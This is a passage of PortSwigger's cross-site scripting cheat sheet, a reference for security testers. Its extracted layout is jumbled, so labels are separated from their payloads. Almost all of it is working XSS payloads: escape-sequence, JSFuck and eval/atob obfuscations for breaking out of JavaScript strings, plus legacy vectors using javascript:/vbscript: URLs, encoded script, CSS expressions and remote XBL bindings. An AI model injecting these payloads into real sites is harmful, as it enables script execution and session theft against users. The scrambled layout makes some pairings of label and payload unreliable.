syntax (globalThis)

Reflected XSS into a JavaScript string: hex escape ';window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']

['\x64\x6f\x6d\x61\x69\x6e']);//
sequence (window)

Reflected XSS into a JavaScript string: hex escape ';self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']

['\x64\x6f\x6d\x61\x69\x6e']);//
sequence (self)

Reflected XSS into a JavaScript string: hex escape ';this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']

['\x64\x6f\x6d\x61\x69\x6e']);//
sequence (this)

Reflected XSS into a JavaScript string: hex escape ';top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']

['\x64\x6f\x6d\x61\x69\x6e']);//
sequence (top)

Reflected XSS into a JavaScript string: hex escape ';parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']

['\x64\x6f\x6d\x61\x69\x6e']);//
sequence (parent)

Reflected XSS into a JavaScript string: hex escape ';frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']

['\x64\x6f\x6d\x61\x69\x6e']);//
sequence (frames)

Reflected XSS into a JavaScript string: hex escape ';globalThis['\x61\x6c\x65\x72\x74']

(globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']
sequence (globalThis)
['\x64\x6f\x6d\x61\x69\x6e']);//

Reflected XSS into a JavaScript string: hex escape ';window['\x65\x76\x61\x6c']('window["\x61\x6c\x65\x72\x74"]

(window["\x61\x74\x6f\x62"]("WFNT"))');//
sequence and base64 encoded string (window)
Reflected XSS into a JavaScript string: hex escape ';self['\x65\x76\x61\x6c']('self["\x61\x6c\x65\x72\x74"]
(self["\x61\x74\x6f\x62"]("WFNT"))');//
sequence and base64 encoded string (self)

Reflected XSS into a JavaScript string: hex escape ';this['\x65\x76\x61\x6c']('this["\x61\x6c\x65\x72\x74"]

(this["\x61\x74\x6f\x62"]("WFNT"))');//
sequence and base64 encoded string (this)

Reflected XSS into a JavaScript string: hex escape ';top['\x65\x76\x61\x6c']('top["\x61\x6c\x65\x72\x74"]

(top["\x61\x74\x6f\x62"]("WFNT"))');//
sequence and base64 encoded string (top)

Reflected XSS into a JavaScript string: hex escape ';parent['\x65\x76\x61\x6c']('parent["\x61\x6c\x65\x72\x74"]

(parent["\x61\x74\x6f\x62"]("WFNT"))');//
sequence and base64 encoded string (parent)

Reflected XSS into a JavaScript string: hex escape ';frames['\x65\x76\x61\x6c']('frames["\x61\x6c\x65\x72\x74"]

(frames["\x61\x74\x6f\x62"]("WFNT"))');//
sequence and base64 encoded string (frames)

Reflected XSS into a JavaScript string: hex escape ';globalThis['\x65\x76\x61\x6c']('globalThis["\x61\x6c\x65\x72\x74"]

(globalThis["\x61\x74\x6f\x62"]("WFNT"))');//
sequence and base64 encoded string (globalThis)

Reflected XSS into a JavaScript string: octal escape ';window['\141\154\145\162\164']('\130\123\123');//

sequence (window)

Reflected XSS into a JavaScript string: octal escape ';self['\141\154\145\162\164']('\130\123\123');//

sequence (self)

Reflected XSS into a JavaScript string: octal escape ';this['\141\154\145\162\164']('\130\123\123');//

sequence (this)

Reflected XSS into a JavaScript string: octal escape ';top['\141\154\145\162\164']('\130\123\123');//

sequence (top)

Reflected XSS into a JavaScript string: octal escape ';parent['\141\154\145\162\164']('\130\123\123');//

sequence (parent)

Reflected XSS into a JavaScript string: octal escape ';frames['\141\154\145\162\164']('\130\123\123');//

sequence (frames)

Reflected XSS into a JavaScript string: octal escape ';globalThis['\141\154\145\162\164']('\130\123\123');//

sequence (globalThis)

Reflected XSS into a JavaScript string: unicode ';window['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']

('\u{0058}\u{0053}\u{0053}');//
escape (window)

Reflected XSS into a JavaScript string: unicode ';self['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']

('\u{0058}\u{0053}\u{0053}');//
escape (self)

Reflected XSS into a JavaScript string: unicode ';this['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']

('\u{0058}\u{0053}\u{0053}');//
escape (this)

Reflected XSS into a JavaScript string: unicode ';top['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']

('\u{0058}\u{0053}\u{0053}');//
escape (top)

Reflected XSS into a JavaScript string: unicode ';parent['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']

('\u{0058}\u{0053}\u{0053}');//
escape (parent)

Reflected XSS into a JavaScript string: unicode ';frames['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']

('\u{0058}\u{0053}\u{0053}');//
escape (frames)

Reflected XSS into a JavaScript string: unicode ';globalThis['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']

('\u{0058}\u{0053}\u{0053}');//
escape (globalThis)

Reflected XSS into a JavaScript string: RegExp ';window[/al/.source+/ert/.source](/XSS/.source);//

source property (window)
 ';self[/al/.source+/ert/.source](/XSS/.source);//
Reflected XSS into a JavaScript string: RegExp
source property (self)

Reflected XSS into a JavaScript string: RegExp ';this[/al/.source+/ert/.source](/XSS/.source);//

source property (this)

Reflected XSS into a JavaScript string: RegExp ';top[/al/.source+/ert/.source](/XSS/.source);//

source property (top)

Reflected XSS into a JavaScript string: RegExp ';parent[/al/.source+/ert/.source](/XSS/.source);//

source property (parent)

Reflected XSS into a JavaScript string: RegExp ';frames[/al/.source+/ert/.source](/XSS/.source);//

source property (frames)

Reflected XSS into a JavaScript string: RegExp ';globalThis[/al/.source+/ert/.source](/XSS/.source);//

source property (globalThis)

Reflected XSS into a JavaScript string: ';window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+

(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
Hieroglyphy/JSFuck (window)

Reflected XSS into a JavaScript string: ';self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!!

[]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
Hieroglyphy/JSFuck (self)

Reflected XSS into a JavaScript string: ';this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!!

[]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
Hieroglyphy/JSFuck (this)

Reflected XSS into a JavaScript string: ';top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!!

[]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
Hieroglyphy/JSFuck (top)

Reflected XSS into a JavaScript string: ';parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+

(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
Hieroglyphy/JSFuck (parent)

Reflected XSS into a JavaScript string: ';frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+

(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
Hieroglyphy/JSFuck (frames)

Reflected XSS into a JavaScript string: ';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!!

[]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
Hieroglyphy/JSFuck (globalThis)

Classic vectors (XSS crypt)

Image src with JavaScript protocol <img src="javascript:alert(1)">

Body background with JavaScript protocol <body background="javascript:alert(1)">

Iframe data urls no longer work as modern browsers <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
use a null origin

VBScript protocol used to work in IE <a href="vbscript:MsgBox+1">XSS</a>

<a href="#" onclick="vbs:Msgbox+1">XSS</a>
<a href="#" onclick="VBS:Msgbox+1">XSS</a>
<a href="#" onclick="vbscript:Msgbox+1">XSS</a>
<a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a>
<a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>

JScript compact was a minimal version of JS that <a href="#" onclick="jscript.compact:alert(1);">test</a>

<a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
wasn't widely used in IE

JScript.Encode allows encoded JavaScript <a href=# language="JScript.Encode"

onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
<a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>

VBScript.Encoded allows encoded VBScript <iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

<iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
 JavaScript entities used to work in Netscape <a title="&{alert(1)}">XSS</a>
Navigator

JavaScript stylesheets used to be supported by <link href="xss.js" rel=stylesheet type="text/javascript">

Netscape Navigator

Button used to consume markup <form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume <form action=x><button>XSS</button><select name=x><option><plaintext>
<script>token="supersecret"</script>
markup

XBL Firefox only <= 2 <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">

<div style="\-\mo\z-
binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin\67:url(//businessinfo.co.uk/lab
s/xbl/xbl.xml#xss)">
<div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab
s/xbl/xbl.xml#xss)">

XBL also worked in FF3.5 using data urls
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-
8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22
http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimple
mentation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js
%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20sc
r.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20
document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.
appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%
3C/ binding%3E%3C/bindings%3E)" />

CSS expressions <=IE7 <div style=xss:expression(alert(1))>

<div style=xss:expression(1)-alert(1)>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio\006e(alert(1))>
<div style=xss:expressio\00006e(alert(1))>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio&#x5c;6e(alert(1))>

In quirks mode IE allowed you to use = instead of : <div style=xss=expression(alert(1))>

<div style="color&#x3dred">test</div>

Behaviors for older modes of IE <a style="behavior:url(#default#AnchorClick);"

folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in <script>

function window.onload(){
functions
alert(1);
}
</script>
<script>
function window::onload(){
alert(1);
}
</script>
<script>
function window.location(){
}
</script>
<body>
<script>
function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){}
</script>
</body>
<body>
<script>
function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>"; }
</script>
</body>

GreyMagic HTML+time exploit (no longer works <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

<?import namespace="t" implementation="#default#time2"><t:set
even in 5 docmode)
attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY>
</HTML>

Credits
Brought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to: James Kettle, Mario Heiderich, Eduardo
Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a,
Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay,
Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush
Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David
Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu
You can contribute to this cheat sheet by updating the JSON and creating a pull request